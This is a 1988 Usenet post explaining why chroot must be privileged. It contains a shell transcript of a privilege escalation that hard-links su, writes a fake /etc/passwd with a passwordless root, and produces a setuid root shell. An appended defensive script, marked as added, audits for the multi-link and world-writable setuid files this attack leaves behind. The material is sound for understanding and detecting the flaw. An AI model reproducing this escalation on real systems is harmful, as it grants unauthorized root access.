Xref: utzoo news.admin:4110 news.sysadmin:1728 comp.mail.uucp:2392
Path: utzoo!attcan!uunet!pyrdc!jetson!john
From: john@jetson.UPMA.MD.US (John Owens)
Newsgroups: news.admin,news.sysadmin,comp.mail.uucp
Subject: Re: Dangerous hole in Usenet!
Message-ID: <172@jetson.UPMA.MD.US>
Date: 29 Nov 88 21:19:33 GMT
References: <1971@van-bc.UUCP> <572@comdesign.CDI.COM> <5517@medusa.cs.purdue.edu> <155@ecicrl.UUCP>
Organization: SMART HOUSE Limited Partnership
Lines: 34

In article <155@ecicrl.UUCP>, clewis@ecicrl.UUCP (Chris Lewis) writes:
> Secondly, can someone out there explain why chroot is privileged?  Or
> why /etc/chroot isn't setuid?

Hmm.

% ln /bin/su /tmp/su
% mkdir /tmp/etc
% echo root::0:0::/:/sh > /tmp/etc/passwd
% ln /bin/sh /tmp/sh
% ln /bin/chown /tmp/chown
% ln /bin/chmod /tmp/chmod
% cd /tmp
% /etc/chroot /tmp /sh
$ ./su root
# chown root sh
# chmod u+s sh
# exit
$ exit
% /tmp/sh
$ id
ruid=555 euid=0 gid=101
$ .....

[Or some variation of the above; please don't pick on details unless
they're fatal to the concept.]

In other words, chroot allows you to fool privileged programs that
rely on files with particular pathnames (/etc/passwd, /etc/group,
/etc/hosts.equiv, /usr/lib/sendmail.cf, /usr/lib/aliases, etc.).

-- 
John Owens		john@jetson.UPMA.MD.US		uunet!jetson!john
+1 301 249 6000		john%jetson.uucp@uunet.uu.net
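
Added example, not part of the original post: a defender-side audit for the two filesystem artifacts the transcript above depends on, a second hard link to a set-uid binary and a set-uid file sitting in a world-writable directory. The function names and the sample tree are hypothetical and constructed for illustration.

```shell
#!/bin/sh
# Added example, not from the original post. Audits a tree for the two
# artifacts the transcript depends on and leaves behind.

# Set-uid/set-gid regular files with more than one hard link: a second name
# for the same privileged inode exists on this filesystem
# (cf. "ln /bin/su /tmp/su").
suid_multilink() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -links +1 -print
}

# Set-uid/set-gid regular files whose parent directory is world-writable
# (cf. the set-uid /tmp/sh at the end of the transcript).
suid_in_world_writable() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print |
    while IFS= read -r f; do
        # Character 9 of the ls -ld mode string is the "other write" bit.
        case $(ls -ld "$(dirname "$f")") in
            d???????w*) printf '%s\n' "$f" ;;
        esac
    done
}

# Constructed sample tree (hypothetical names), owned by the invoking user:
#   $1/bin/tool     set-uid, hard-linked to $1/scratch/tool
#   $1/scratch      mode 1777, like /tmp
#   $1/bin/plain    ordinary file, must not be reported
make_demo_tree() {
    mkdir -p "$1/bin" "$1/scratch"
    chmod 755 "$1/bin"
    chmod 1777 "$1/scratch"
    : > "$1/bin/tool"
    : > "$1/bin/plain"
    ln "$1/bin/tool" "$1/scratch/tool"
    chmod 4755 "$1/bin/tool"
}

# Usage: sh audit.sh DIR...  (with no arguments only the functions are defined)
for dir in "$@"; do
    echo "== multi-link set-id files under $dir"
    suid_multilink "$dir"
    echo "== set-id files in world-writable directories under $dir"
    suid_in_world_writable "$dir"
done
```

File names containing newlines are not handled by the second function; the first prints whatever find reports.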